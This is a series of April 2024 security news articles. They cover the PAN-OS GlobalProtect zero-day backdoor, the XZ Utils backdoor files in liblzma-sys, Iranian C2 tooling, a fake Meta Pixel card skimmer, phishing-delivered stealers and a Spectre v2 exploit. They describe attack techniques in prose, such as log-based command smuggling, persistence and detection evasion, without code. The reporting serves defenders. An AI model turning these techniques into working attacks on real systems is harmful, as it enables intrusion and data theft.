The most interesting aspect of the attack chain is that both the files used to extract the commands and write the results are legitimate files associated with the firewall -
/var/log/pan/sslvpn_ngx_error.log
/var/appweb/sslvpndocs/global-protect/portal/css/bootstrap.min.css
As for how
the commands are written to the web server error log, the threat actor forges
specially crafted network requests to a non-existent web page containing a
specific pattern. The backdoor then parses the log file and searches for the
line matching the same regular expression ("img\[([a-zA-Z0-9+/=]+)\]") to decode
and run the command within it.
"The script will then create another thread that runs a function called restore," Unit 42 said. "The restore function takes the original content of the bootstrap.min.css file, as well as the original access and modified times, sleeps for 15 seconds and writes the original contents back to the file and sets the access and modified times to their originals."
The main goal appears to be to avoid leaving traces of the command outputs,
necessitating that the results are exfiltrated within 15 seconds before the file
is overwritten.
Volexity, in its own analysis, said it observed the threat actor remotely exploiting the firewall to create a reverse shell, download additional tooling, pivot into internal networks, and ultimately exfiltrate data. The exact scale of the campaign is presently unclear. The adversary has been assigned the moniker UTA0218 by the company.
"The tradecraft and speed employed by the attacker suggests a highly capable threat actor with a clear playbook of what to access to further their objectives," the American cybersecurity firm said.
"UTA0218's initial objectives were aimed at grabbing the domain backup DPAPI keys and targeting active directory credentials by obtaining the NTDS.DIT file. They further targeted user workstations to steal saved cookies and login data, along with the users' DPAPI keys."
Organizations are recommended to look for signs of lateral movement internally from their Palo Alto Networks GlobalProtect firewall device.
The development has also prompted the U.S. Cybersecurity and Infrastructure Security Agency (CISA) to add the flaw to its Known Exploited Vulnerabilities (KEV) catalog, requiring federal agencies to apply the patches by April 19 to mitigate potential threats. Palo Alto Networks is expected to release fixes for the flaw no later than April 14.
"Targeting edge devices remains a popular vector of attack for capable threat actors who have the time and resources to invest into researching new vulnerabilities," Volexity said.
"It is highly likely UTA0218 is a state-backed threat actor based on the resources required to develop and exploit a vulnerability of this nature, the type of victims targeted by this actor, and the capabilities displayed to install the Python backdoor and further access victim networks."
U.S. Treasury Hamas Spokesperson for Cyber Influence Operations
13.4.24
BigBrothers
The Hacker News
The U.S. Treasury Department's
Office of Foreign Assets Control (OFAC) on Friday announced sanctions against an
official associated with Hamas for his involvement in cyber influence
operations.
Hudhayfa Samir 'Abdallah al-Kahlut, 39, also known as Abu Ubaida, has served as the public spokesperson of Izz al-Din al-Qassam Brigades, the military wing of Hamas, since at least 2007.
"He publicly threatened to execute civilian hostages held by Hamas following the terrorist group's October 7, 2023, attacks on Israel," the Treasury Department said.
"Al-Kahlut leads the cyber influence department of al-Qassam Brigades. He was involved in procuring servers and domains in Iran to host the official al-Qassam Brigades website in cooperation with Iranian institutions."
Alongside Al-Kahlut, two other individuals named William Abu Shanab, 56, and Bara'a Hasan Farhat, 35, for their role in the manufacturing of unmanned aerial vehicles (UAVs) used by Hamas to conduct terrorist operations, including urban warfare and intelligence gathering.
Both Abu Shanab and his assistant Farhat are said to be part of the Lebanon-based al-Shimali unit, where the former is a commander.
Coinciding with the actions taken by the U.S., the European Union imposed sanctions of its own against Al-Qassam Brigades, Al-Quds Brigades, and Nukhba Force for their "brutal and indiscriminate terrorist attacks" targeting Israel last year.
While Al-Quds Brigades is the armed wing of Palestinian Islamic Jihad, Nukhba Force is a special forces unit of Hamas.
The joint action, said Under Secretary of the Treasury for Terrorism and Financial Intelligence Brian E. Nelson, is aimed at "disrupting Hamas's ability to conduct further attacks, including through cyber warfare and the production of UAVs."
The development arrived a little over two months after the U.S. government sanctioned six Iranian officials associated with the Iranian intelligence agency for attacking critical infrastructure entities in the U.S. and other countries.
Popular Rust Crate liblzma-sys Compromised with XZ Utils Backdoor Files
13.4.24
Virus
The Hacker News
"Test files" associated with the XZ
Utils backdoor have made their way to a Rust crate known as liblzma-sys, new
findings from Phylum reveal.
liblzma-sys, which has been downloaded over 21,000 times to date, provides Rust developers with bindings to the liblzma implementation, an underlying library that is part of the XZ Utils data compression software. The impacted version in question is 0.3.2.
"The current distribution (v0.3.2) on Crates.io contains the test files for XZ that contain the backdoor," Phylum noted in a GitHub issue raised on April 9, 2024.
"The test files themselves are not included in either the .tar.gz nor the .zip tags here on GitHub and are only present in liblzma-sys_0.3.2.crate that is installed from Crates.io."
Following responsible disclosure, the files in question ("tests/files/bad-3-corrupt_lzma2.xz" and "tests/files/good-large_compressed.lzma") have since been removed from liblzma-sys version 0.3.3 released on April 10. The previous version of the crate has been pulled from the registry.
"The malicious tests files were committed upstream, but due to the malicious build instructions not being present in the upstream repository, they were never called or executed," Snyk said in an advisory of its own.
The backdoor in XZ Utils was discovered in late March when Microsoft engineer Andres Freund identified malicious commits to the command-line utility impacting versions 5.6.0 and 5.6.1 released in February and March 2024, respectively. The popular package is integrated into many Linux distributions.
The code commits, made by a now-suspended GitHub user named JiaT75 (aka Jia
Tan), essentially made it possible to circumvent authentication controls within
SSH to execute code remotely, potentially allowing the operators to take over
the system.
"The overall compromise spanned over two years," SentinelOne researchers Sarthak Misraa and Antonio Pirozzi said in an analysis published this week. "Under the alias Jia Tan, the actor began contributing to the xz project on October 29, 2021."
"Initially, the commits were innocuous and minor. However, the actor gradually became a more active contributor to the project, steadily gaining reputation and trust within the community."
According to Russian cybersecurity company Kaspersky, the trojanized changes take the form of a multi-stage operation.
"The source code of the build infrastructure that generated the final packages was slightly modified (by introducing an additional file build-to-host.m4) to extract the next stage script that was hidden in a test case file (bad-3-corrupt_lzma2.xz)," it said.
"These scripts in turn extracted a malicious binary component from another test
case file (good-large_compressed.lzma) that was linked with the legitimate
library during the compilation process to be shipped to Linux repositories."
The payload, a shell script, is responsible for the extraction and the execution of the backdoor, which, in turn, hooks into specific functions – RSA_public_decrypt, EVP_PKEY_set1_RSA, and RSA_get0_key – that will allow it to monitor every SSH connection to the infected machine.
The primary goal of the backdoor slipped into liblzma is to manipulate Secure Shell Daemon (sshd) and monitor for commands sent by an attacker at the start of an SSH session, effectively introducing a way to achieve remote code execution.
While the early discovery of the backdoor averted what could have been a widespread compromise of the Linux ecosystem, the development is once again a sign that open-source package maintainers are being targeted by social engineering campaigns with the goal of staging software supply chain attacks.
In this case, it materialized in the form of a coordinated activity that presumably featured several sockpuppet accounts that orchestrated a pressure campaign aimed at forcing the project's longtime maintainer to bring on board a co-maintainer to add more features and address issues.
"The flurry of open source code contributions and related pressure campaigns from previously unknown developer accounts suggests that a coordinated social engineering campaign using phony developer accounts was used to sneak malicious code into a widely used open-source project," ReversingLabs said.
SentinelOne researchers revealed that the subtle code changes made by JiaT75 between versions 5.6.0 and 5.6.1 suggest that the modifications were engineered to enhance the backdoor's modularity and plant more malware.
As of April 9, 2024, the source code repository associated with XZ Utils has been restored on GitHub, nearly two weeks after it was disabled for a violation of the company's terms of service.
The attribution of the operation and the intended targets are currently unknown, although in light of the planning and sophistication behind it, the threat actor is suspected to be a state-sponsored entity.
"It's evident that this backdoor is highly complex and employs sophisticated methods to evade detection," Kaspersky said.
Iranian MuddyWater Hackers Adopt New C2 Tool 'DarkBeatC2' in Latest Campaign
12.4.24
APT
The Hacker News
The Iranian threat actor known as
MuddyWater has been attributed to a new command-and-control (C2) infrastructure
called DarkBeatC2, becoming the latest such tool in its arsenal after
SimpleHarm, MuddyC3, PhonyC2, and MuddyC2Go.
"While occasionally switching to a new remote administration tool or changing their C2 framework, MuddyWater's methods remain constant," Deep Instinct security researcher Simon Kenin said in a technical report published last week.
MuddyWater, also called Boggy Serpens, Mango Sandstorm, and TA450, is assessed to be affiliated with Iran's Ministry of Intelligence and Security (MOIS). It's known to be active since at least 2017, orchestrating spear-phishing attacks that lead to the deployment of various legitimate Remote Monitoring and Management (RMM) solutions on compromised systems.
Prior findings from Microsoft show that the group has ties with another Iranian threat activity cluster tracked as Storm-1084 (aka DarkBit), with the latter leveraging the access to orchestrate destructive wiper attacks against Israeli entities.
The latest attack campaign, details of which were also previously revealed by Proofpoint last month, commences with spear-phishing emails sent from compromised accounts that contain links or attachments hosted on services like Egnyte to deliver the Atera Agent software.
One of the URLs in question is "kinneretacil.egnyte[.]com," where the subdomain "kinneretacil" refers to "kinneret.ac.il," an educational institution in Israel and a customer of Rashim, which, in turn, was breached by Lord Nemesis (aka Nemesis Kitten or TunnelVision) as part of a supply chain attack targeting the academic sector in the country.
Lord Nemesis is suspected of being a "faketivist" operation directed against Israel. It's also worth noting that Nemesis Kitten is a private contracting company called Najee Technology, a subgroup within Mint Sandstorm that's backed by Iran's Islamic Revolutionary Guard Corps (IRGC). The company was sanctioned by the U.S. Treasury in September 2022.
"This is important because if 'Lord Nemesis' were able to breach Rashim's email system, they might have breached the email systems of Rashim's customers using the admin accounts that now we know they obtained from 'Rashim,'" Kenin explained.
The web of connections has raised the possibility that MuddyWater may have used
the email account associated with Kinneret to distribute the links, thereby
giving the messages an illusion of trust and tricking the recipients into
clicking them.
"While not conclusive, the timeframe and context of the events indicate a potential hand-off or collaboration between IRGC and MOIS to inflict as much harm as possible on Israeli organizations and individuals," Kenin further added.
The attacks are also notable for relying on a set of domains and IP addresses collectively dubbed DarkBeatC2 that are responsible for managing the infected endpoints. This is accomplished by means of PowerShell code designed to establish contact with the C2 server upon gaining initial access through other means.
According to independent findings from Palo Alto Networks Unit 42, the threat actor has been observed abusing the Windows Registry's AutodialDLL function to side-load a malicious DLL and ultimately set up connections with a DarkBeatC2 domain.
The mechanism, in particular, involves establishing persistence through a scheduled task that runs PowerShell to leverage the AutodialDLL registry key and load the DLL for C2 framework. The cybersecurity firm said the technique was put to use in a cyber attack aimed at an unnamed Middle East target.
Other methods adopted by MuddyWater to establish a C2 connection include the use of a first-stage payload delivered via the spear-phishing email and leveraging DLL side-loading to execute a malicious library.
A successful contact allows the infected host to receive PowerShell responses that, for its part, fetches two more PowerShell scripts from the same server.
While one of the scripts is designed to read the contents of a file named "C:\ProgramData\SysInt.log" and transmit them to the C2 server via an HTTP POST request, the second script periodically polls the server to obtain additional payloads and writes the results of the execution to "SysInt.log." The exact nature of the next-stage payload is currently unknown.
"This framework is similar to the previous C2 frameworks used by MuddyWater," Kenin said. "PowerShell remains their 'bread and butter.'"
Curious Serpens Targets Defense Sector with FalseFont Backdoor#
The
disclosure comes as Unit 42 unpacked the inner workings of a backdoor called
FalseFont that's used by an Iranian threat actor known as Peach Sandstorm (aka
APT33, Curious Serpens, Elfin, and Refined Kitten) in attacks targeting the
aerospace and defense sectors.
"The threat actors mimic legitimate human resources software, using a fake job recruitment process to trick victims into installing the backdoor," security researchers Tom Fakterman, Daniel Frank, and Jerome Tujague said, describing FalseFont as "highly targeted."
Once installed, it presents a login interface impersonating an aerospace company and captures the credentials as well as the educational and employment history entered by the victim to a threat-actor controlled C2 server in JSON format.
The implant, besides its graphical user interface (GUI) component for user inputs, also stealthily activates a second component in the background that establishes persistence on the system, gathers system metadata, and executes commands and processes sent from the C2 server.
Other features of FalseFont include the ability to download and upload files, steal credentials, capture screenshots, terminate specific processes, run PowerShell commands, and self-update the malware.
Zero-Day Alert: Critical Palo Alto Networks PAN-OS Flaw Under Active Attack
12.4.24
Vulnerebility
The Hacker News
Palo Alto Networks is warning that
a critical flaw impacting its PAN-OS software used in its GlobalProtect gateways
is being exploited in the wild.
Tracked as CVE-2024-3400, the issue has a CVSS score of 10.0, indicating maximum severity.
"A command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall," the company said in an advisory published today.
The flaw impacts the following versions of PAN-OS, with fixes expected to be released on April 14, 2024 -
PAN-OS < 11.1.2-h3
PAN-OS < 11.0.4-h1
PAN-OS < 10.2.9-h1
The company
also said that the issue is applicable only to firewalls that have the
configurations for both GlobalProtect gateway (Network > GlobalProtect >
Gateways) and device telemetry (Device > Setup > Telemetry) enabled.
Cybersecurity firm Volexity has been credited with discovering and reporting the bug.
While there are no other technical details about the nature of the attacks, Palo Alto Networks acknowledged that it's "aware of a limited number of attacks that leverage the exploitation of this vulnerability."
In the interim, it's recommending customers with a Threat Prevention subscription to enable Threat ID 95187 to secure against the threat.
The development comes as Chinese threat actors have increasingly relied on zero-day flaws impacting Barracuda Networks, Fortinet, Ivanti, and VMware to breach targets of interest and deploy covert backdoors for persistent access.
Sneaky Credit Card Skimmer Disguised as Harmless Facebook Tracker
12.4.24
Crime
The Hacker News
Cybersecurity researchers have
discovered a credit card skimmer that's concealed within a fake Meta Pixel
tracker script in an attempt to evade detection.
Sucuri said that the malware is injected into websites through tools that allow for custom code, such as WordPress plugins like Simple Custom CSS and JS or the "Miscellaneous Scripts" section of the Magento admin panel.
"Custom script editors are popular with bad actors because they allow for external third party (and malicious) JavaScript and can easily pretend to be benign by leveraging naming conventions that match popular scripts like Google Analytics or libraries like JQuery," security researcher Matt Morrow said.
The bogus Meta Pixel tracker script identified by the web security company contains similar elements as its legitimate counterpart, but a closer examination reveals the addition of JavaScript code that substitutes references to the domain "connect.facebook[.]net" with "b-connected[.]com."
While the former is a genuine domain linked to the Pixel tracking functionality, the replacement domain is used to load an additional malicious script ("fbevents.js") that monitors if a victim is on a checkout page, and if so, serves a fraudulent overlay to grab their credit card details.
It's worth noting that "b-connected[.]com" is a legitimate e-commerce website that has been compromised at some point to host the skimmer code. What's more, the information entered into the fake form is exfiltrated to another compromised site ("www.donjuguetes[.]es").
To mitigate such risks, it's recommended to keep the sites up-to-date, periodically review admin accounts to determine if all of them are valid, and update passwords on a frequent basis.
This is particularly important as threat actors are known to leverage weak passwords and flaws in WordPress plugins to gain elevated access to a target site and add rogue admin users, which are then used to perform various other activities, including adding additional plugins and backdoors.
"Because credit card stealers often wait for keywords such as 'checkout' or
'onepage,' they may not become visible until the checkout page has loaded,"
Morrow said.
"Since most checkout pages are dynamically generated based on cookie data and other variables passed to the page, these scripts evade public scanners and the only way to identify the malware is to check the page source or watch network traffic. These scripts run silently in the background."
The development comes as Sucuri also revealed that sites built with WordPress and Magento are the target of another malware called Magento Shoplift. Earlier variants of Magento Shoplift have been detected in the wild since September 2023.
The attack chain starts with injecting an obfuscated JavaScript snippet into a legitimate JavScript file that's responsible for loading a second script from jqueurystatics[.]com via WebSocket Secure (WSS), which, in turn, is designed to facilitate credit card skimming and data theft while masquerading as a Google Analytics script.
"WordPress has become a massive player in e-commerce as well, thanks to the adoption of Woocommerce and other plugins that can easily turn a WordPress site into a fully-featured online store," researcher Puja Srivastava said.
"This popularity also makes WordPress stores a prime target — and attackers are modifying their MageCart e-commerce malware to target a wider range of CMS platforms."
U.S. Federal Agencies Ordered to Hunt for Signs of Microsoft Breach and Mitigate
Risks
12.4.24
BigBrothers
The Hacker News
The U.S. Cybersecurity and
Infrastructure Security Agency (CISA) on Thursday issued an emergency directive
(ED 24-02) urging federal agencies to hunt for signs of compromise and enact
preventive measures following the recent compromise of Microsoft's systems that
led to the theft of email correspondence with the company.
The attack, which came to light earlier this year, has been attributed to a Russian nation-state group tracked as Midnight Blizzard (aka APT29 or Cozy Bear). Last month, Microsoft revealed that the adversary managed to access some of its source code repositories but noted that there is no evidence of a breach of customer-facing systems.
The emergency directive, which was originally issued privately to federal agencies on April 2, was first reported on by CyberScoop two days later.
"The threat actor is using information initially exfiltrated from the corporate email systems, including authentication details shared between Microsoft customers and Microsoft by email, to gain, or attempt to gain, additional access to Microsoft customer systems," CISA said.
The agency said the theft of email correspondence between government entities and Microsoft poses severe risks, urging concerned parties to analyze the content of exfiltrated emails, reset compromised credentials, and take additional steps to ensure authentication tools for privileged Microsoft Azure accounts are secure.
It's currently not clear how many federal agencies have had their email exchanges exfiltrated in the wake of the incident, although CISA said all of them have been notified.
The agency is also urging affected entities to perform a cybersecurity impact analysis by April 30, 2024, and provide a status update by May 1, 2024, 11:59 p.m. Other organizations that are impacted by the breach are advised to contact their respective Microsoft account team for any additional questions or follow up.
"Regardless of direct impact, all organizations are strongly encouraged to apply stringent security measures, including strong passwords, multi-factor authentication (MFA) and prohibited sharing of unprotected sensitive information via unsecure channels," CISA said.
The development comes as CISA released a new version of its malware analysis system, called Malware Next-Gen, that allows organizations to submit malware samples (anonymously or otherwise) and other suspicious artifacts for analysis.
TA547 Phishing Attack Hits German Firms with Rhadamanthys Stealer
12.4.24
Phishing
The Hacker News
A threat actor tracked as TA547 has
targeted dozens of German organizations with an information stealer called
Rhadamanthys as part of an invoice-themed phishing campaign.
"This is the first time researchers observed TA547 use Rhadamanthys, an information stealer that is used by multiple cybercriminal threat actors," Proofpoint said. "Additionally, the actor appeared to use a PowerShell script that researchers suspect was generated by a large language model (LLM)."
TA547 is a prolific, financially motivated threat actor that's known to be active since at least November 2017, using email phishing lures to deliver a variety of Android and Windows malware such as ZLoader, Gootkit, DanaBot, Ursnif, and even Adhubllka ransomware.
In recent years, the group has evolved into an initial access broker (IAB) for ransomware attacks. It has also been observed employing geofencing tricks to restrict payloads to specific regions.
The email messages observed as part of the latest campaign impersonate the German company Metro AG and contain a password-protected ZIP file containing a ZIP archive that, when opened, initiates the execution of a remote PowerShell script to launch the Rhadamanthys stealer directly in memory.
Interestingly, the PowerShell script used to load Rhadamanthys includes "grammatically correct and hyper specific comments" for each instruction in the program, raising the possibility that it may have been generated (or rewritten) using an LLM.
The alternate hypothesis is that TA547 copied the script from another source that had used generative AI technology to create it.
"This campaign represents an example of some technique shifts from TA547 including the use of compressed LNKs and previously unobserved Rhadamanthys stealer," Proofpoint said. "It also provides insight into how threat actors are leveraging likely LLM-generated content in malware campaigns."
The development comes as phishing campaigns have also been banking on uncommon tactics to facilitate credential-harvesting attacks. In these emails, recipients are notified of a voice message and are directed to click on a link to access it.
The payload retrieved from the URL is heavily obfuscated HTML content that runs JavaScript code embedded within an SVG image when the page is rendered on the target system.
Present within the SVG data is "encrypted data containing a second stage page
prompting the target to enter their credentials to access the voice message,"
Binary Defense said, adding the page is encrypted using CryptoJS.
Other email-based attacks have paved the way for Agent Tesla, which has emerged as an attractive option for threat actors due to it "being an affordable malware service with multiple capabilities to exfiltrate and steal users' data," according to Cofense.
Social engineering campaigns have also taken the form of malicious ads served on search engines like Google that lure unsuspecting users into downloading bogus installers for popular software like PuTTY, FileZilla, and Room Planner to ultimately deploy Nitrogen and IDAT Loader.
The infection chain associated with IDAT Loader is noteworthy for the fact that the MSIX installer is used to launch a PowerShell script that, in turn, contacts a Telegram bot to fetch a second PowerShell script hosted on the bot.
This PowerShell script then acts as a conduit to deliver another PowerShell script that's used to bypass Windows Antimalware Scan Interface (AMSI) protections as well as trigger the execution of the loader, which subsequently proceeds to load the SectopRAT trojan.
"Endpoints can be protected from malicious ads via group policies that restrict traffic coming from the main and lesser known ad networks," Jérôme Segura, principal threat researcher at Malwarebytes, said.
Apple Updates Spyware Alert System to Warn Victims of Mercenary Attacks
11.4.24
OS
The Hacker News
Apple on Wednesday revised its
documentation pertaining to its mercenary spyware threat notification system to
mention that it alerts users when they may have been individually targeted by
such attacks.
It also specifically called out companies like NSO Group for developing commercial surveillance tools such as Pegasus that are used by state actors to pull off "individually targeted attacks of such exceptional cost and complexity."
"Though deployed against a very small number of individuals — often journalists, activists, politicians, and diplomats — mercenary spyware attacks are ongoing and global," Apple said.
"The extreme cost, sophistication, and worldwide nature of mercenary spyware attacks makes them some of the most advanced digital threats in existence today."
The update marks a change in wording that previously said these "threat notifications" are designed to inform and assist users who may have been targeted by state-sponsored attackers.
According to TechCrunch, Apple is said to have sent threat notifications to iPhone users in 92 countries at 12:00 p.m. PST on Wednesday coinciding with the revision to the support page.
It's worth noting that Apple began sending threat notifications to warn users it believes have been targeted by state-sponsored attackers starting November 2021.
However, the company also makes it a point to emphasize that it does not "attribute the attacks or resulting threat notifications" to any particular threat actor or geographical region.
The development comes amid continued efforts by governments around the world to counter the misuse and proliferation of commercial spyware.
Last month, the U.S. government said Finland, Germany, Ireland, Japan, Poland, and South Korea had joined an inaugural group of 11 countries working to develop safeguards against the abuse of invasive surveillance technology.
"Commercial spyware has been misused across the world by authoritarian regimes and in democracies [...] without proper legal authorization, safeguards, or oversight," the governments said in a joint statement.
"The misuse of these tools presents significant and growing risks to our
national security, including to the safety and security of our government
personnel, information, and information systems."
According to a recent report published by Google's Threat Analysis Group (TAG) and Mandiant, commercial surveillance vendors were behind the in-the-wild exploitation of a chunk of the 97 zero-day vulnerabilities discovered in 2023.
All the vulnerabilities attributed to spyware companies targeted web browsers – particularly flaws in third-party libraries that affect more than one browser and substantially increase the attack surface – and mobile devices running Android and iOS.
"Private sector firms have been involved in discovering and selling exploits for many years, but we have observed a notable increase in exploitation driven by these actors over the past several years," the tech giant said.
"Threat actors are increasingly leveraging zero-days, often for the purposes of evasion and persistence, and we don't expect this activity to decrease anytime soon."
Google also said that increased security investments into exploit mitigations are affecting the types of vulnerabilities threat actors can weaponize in their attacks, forcing them to bypass several security guardrails (e.g., Lockdown Mode and MiraclePtr) to infiltrate target devices.
Fortinet Rolls Out Critical Security Patches for FortiClientLinux Vulnerability
11.4.24
Vulnerebility
The Hacker News
Fortinet has released patches to
address a critical security flaw impacting FortiClientLinux that could be
exploited to achieve arbitrary code execution.
Tracked as CVE-2023-45590, the vulnerability carries a CVSS score of 9.4 out of a maximum of 10.
"An Improper Control of Generation of Code ('Code Injection') vulnerability [CWE-94] in FortiClientLinux may allow an unauthenticated attacker to execute arbitrary code via tricking a FortiClientLinux user into visiting a malicious website," Fortinet said in an advisory.
The shortcoming, which has been described as a case of remote code execution due to a "dangerous nodejs configuration," impacts the following versions -
FortiClientLinux versions 7.0.3 through 7.0.4 and 7.0.6 through 7.0.10 (Upgrade
to 7.0.11 or above)
FortiClientLinux version 7.2.0 (Upgrade to 7.2.1 or
above)
Security researcher CataLpa from Dbappsecurity has been credited with
discovering and reporting the vulnerability.
Fortinet's security patches for April 2024 also address an issue with FortiClientMac installer that could also lead to code execution (CVE-2023-45588 and CVE-2024-31492, CVSS scores: 7.8).
Also resolved is a FortiOS and FortiProxy bug that could leak administrator cookies in certain scenarios (CVE-2023-41677, CVSS score: 7.5).
While there is no evidence of any of the flaws being exploited in the wild, it's recommended that users keep their systems up-to-date to mitigate potential threats.
'eXotic Visit' Spyware Campaign Targets Android Users in India and Pakistan
11.4.24
OS
The Hacker News
An active Android malware campaign
dubbed eXotic Visit has been primarily targeting users in South Asia,
particularly those in India and Pakistan, with malware distributed via dedicated
websites and Google Play Store.
Slovak cybersecurity firm said the activity, ongoing since November 2021, is not linked to any known threat actor or group. It's tracking the group behind the operation under the name Virtual Invaders.
"Downloaded apps provide legitimate functionality, but also include code from the open-source Android XploitSPY RAT," ESET security researcher Lukáš Štefanko said in a technical report released today.
The campaign is said to be highly targeted in nature, with the apps available on Google Play having negligible number of installs ranging from zero to 45. The apps have since been taken down.
The fake-but-functional apps primarily masquerade as messaging services like Alpha Chat, ChitChat, Defcom, Dink Messenger, Signal Lite, TalkU, WeTalk, Wicker Messenger, and Zaangi Chat. Approximately 380 victims are said to have downloaded the apps and created accounts to use them for messaging purposes.
Also employed as part of eXotic Visit are apps such as Sim Info and Telco DB, both of which claim to provide details about SIM owners simply by entering a Pakistan-based phone number. Other applications pass off as a food ordering service in Pakistan as well as a legitimate Indian hospital called Specialist Hospital (now rebranded as Trilife Hospital).
XploitSPY, uploaded to GitHub as early as April 2020 by a user named RaoMK, is
associated with an Indian cyber security solutions company called XploitWizer.
It has also been described as a fork of another open-source Android trojan
called L3MON, which, in turn, draws inspiration from AhMyth.
It comes with a wide gamut of features that allows it to gather sensitive data from infected devices, such as GPS locations, microphone recordings, contacts, SMS messages, call logs, and clipboard content; extract notification details from apps like WhatsApp, Facebook, Instagram, and Gmail; download and upload files; view installed apps; and queue commands.
On top of that, the malicious apps are designed to take pictures and enumerate files in several directories related to screenshots, WhatApp, WhatsApp Business, Telegram, and an unofficial WhatsApp mod known as GBWhatsApp.
"Throughout the years, these threat actors have customized their malicious code by adding obfuscation, emulator detection, hiding of [command-and-control] addresses, and use of a native library," Štefanko said.
The main purpose of the native library ("defcome-lib.so") is to keep the C2 server information encoded and hidden from static analysis tools. If an emulator is detected, the app makes use of a fake C2 server to evade detection.
Some of the apps have been propagated through websites specifically created for this purpose ("chitchat.ngrok[.]io") that provide a link to an Android package file ("ChitChat.apk") hosted on GitHub. It's presently not clear how victims are directed to these apps.
"Distribution started on dedicated websites and then even moved to the official Google Play store," Štefanko concluded. "The purpose of the campaign is espionage and probably is targeting victims in Pakistan and India."
Raspberry Robin Returns: New Malware Campaign Spreading Through WSF Files
11.4.24
Virus
The Hacker News
Cybersecurity researchers have
discovered a new Raspberry Robin campaign wave that propagates the malware
through malicious Windows Script Files (WSFs) since March 2024.
"Historically, Raspberry Robin was known to spread through removable media like USB drives, but over time its distributors have experimented with other initial infection vectors," HP Wolf Security researcher Patrick Schläpfer said in a report shared with The Hacker News.
Raspberry Robin, also called QNAP worm, was first spotted in September 2021 that has since evolved into a downloader for various other payloads in recent years, such as SocGholish, Cobalt Strike, IcedID, BumbleBee, and TrueBot, and also serving as a precursor for ransomware.
While the malware was initially distributed by means of USB devices containing LNK files that retrieved the payload from a compromised QNAP device, it has since adopted other methods such as social engineering and malvertising.
It's attributed to an emerging threat cluster tracked by Microsoft as Storm-0856, which has links to the broader cybercrime ecosystem comprising groups like Evil Corp, Silence, and TA505.
The latest distribution vector entails the use of WSF files that are offered for download via various domains and subdomains.
It's currently not clear how the attackers are directing victims to these URLs, although it's suspected that it could be either via spam or malvertising campaigns.
The heavily obfuscated WSF file functions as a downloader to retrieve the main DLL payload from a remote server using the curl command, but not before a series of anti-analysis and anti-virtual machine evaluations are carried out to determine if it's being run in a virtualized environment.
It's also designed to terminate the execution if the build number of the Windows operating system is lower than 17063 (which was released in December 2017) and if the list of running processes includes antivirus processes associated with Avast, Avira, Bitdefender, Check Point, ESET, and Kaspersky.
What's more, it configures Microsoft Defender Antivirus exclusion rules in an effort to sidestep detection by adding the entire main drive to the exclusion list and preventing it from being scanned.
"The scripts itself are currently not classified as malicious by any an-virus scanners on VirusTotal, demonstrating the evasiveness of the malware and the risk of it causing a serious infection with Raspberry Robin," HP said.
"The WSF downloader is heavily obfuscated and uses many an-analysis techniques enabling the malware to evade detection and slow down analysis."
Beware: GitHub's Fake Popularity Scam Tricking Developers into Downloading
Malware
11.4.24
Spam
The Hacker News
Threat actors are now taking advantage of GitHub's search functionality to trick unsuspecting users looking for popular repositories into downloading spurious counterparts that serve malware.
The latest assault on the open-source software supply chain involves concealing malicious code within Microsoft Visual Code project files that's designed to download next-stage payloads from a remote URL, Checkmarx said in a report shared with The Hacker News.
"Attackers create malicious repositories with popular names and topics, using techniques like automated updates and fake stars to boost search rankings and deceive users," security researcher Yehuda Gelb said.
The idea is to manipulate the search rankings in GitHub to bring threat actor-controlled repositories to the top when users filter and sort their results based on the most recent updates and increase the popularity via bogus stars added via fake accounts.
In doing so, the attack lends a veneer of legitimacy and trust to the fraudulent repositories, effectively deceiving developers into downloading them.
"In contrast to past incidents where attackers were found to add hundreds or thousands of stars to their repos, it appears that in these cases, the attackers opted for a more modest number of stars, probably to avoid raising suspicion with an exaggerated number," Gelb said.
It's worth pointing out that previous research from Checkmarx late last year uncovered a black market comprising online stores and chat groups that are selling GitHub stars to artificially boost a repository's popularity, a technique referred to as star inflation.
What's more, a majority of these repositories are disguised as legitimate projects related to popular games, cheats, and tools, adding another layer of sophistication to make it harder to distinguish them from benign code.
Some repositories have been observed downloading an encrypted .7z file
containing an executable named "feedbackAPI.exe" that has been inflated to 750
MB in a likely attempt to evade antivirus scanning and ultimately launch malware
that shares similarities with Keyzetsu clipper.
The Windows malware, which came to light early last year, is often distributed through pirated software such as Evernote. It's capable of diverting cryptocurrency transactions to attacker-owned wallets by substituting the wallet address copied in the clipboard.
The findings underscore the due diligence that developers must follow when downloading source code from open-source repositories, not to mention the dangers of solely relying on reputation as a metric to evaluate trustworthiness.
"The use of malicious GitHub repositories to distribute malware is an ongoing trend that poses a significant threat to the open-source ecosystem," Gelb said.
"By exploiting GitHub's search functionality and manipulating repository properties, attackers can lure unsuspecting users into downloading and executing malicious code."
The development comes as Phylum said it discovered an uptick in the number of spam (i.e., non-malicious) packages being published to the npm registry by a user named ylmin to orchestrate a "massive automated crypto farming campaign" that abuses the Tea protocol.
"The Tea protocol is a web3 platform whose stated goal is compensating open source package maintainers, but instead of cash rewards, they are rewarded with TEA tokens, a cryptocurrency," the company's research team said.
"The Tea protocol is not even live yet. These users are farming points from the 'Incentivized Testnet,' apparently with the expectation that having more points in the Testnet will increase their odds of receiving a later airdrop."
Researchers Uncover First Native Spectre v2 Exploit Against Linux Kernel
10.4.24
Exploit
The Hacker News
Cybersecurity researchers have
disclosed what they say is the "first native Spectre v2 exploit" against the
Linux kernel on Intel systems that could be exploited to read sensitive data
from the memory.
The exploit, called Native Branch History Injection (BHI), can be used to leak arbitrary kernel memory at 3.5 kB/sec by bypassing existing Spectre v2/BHI mitigations, researchers from Systems and Network Security Group (VUSec) at Vrije Universiteit Amsterdam said in a new study.
The shortcoming is being tracked as CVE-2024-2201.
BHI was first disclosed by VUSec in March 2022, describing it as a technique that can get around Spectre v2 protections in modern processors from Intel, AMD, and Arm.
While the attack leveraged extended Berkeley Packet Filters (eBPFs), Intel's recommendations to address the problem, among other things, was to disable Linux's unprivileged eBPFs.
"Privileged managed runtimes that can be configured to allow an unprivileged user to generate and execute code in a privileged domain -- such as Linux's 'unprivileged eBPF' -- significantly increase the risk of transient execution attacks, even when defenses against intra-mode [Branch Target Injection] are present," Intel said at the time.
"The kernel can be configured to deny access to unprivileged eBPF by default,
while still allowing administrators to enable it at runtime where needed."
Native BHI neutralizes this countermeasure by showing that BHI is possible
without eBPF. It impacts all Intel systems that are susceptible to BHI.
As a result, it makes it possible for an attacker with access to CPU resources
to influence speculative execution paths via malicious software installed on a
machine with the goal of extracting sensitive data that are associated with a
different process.
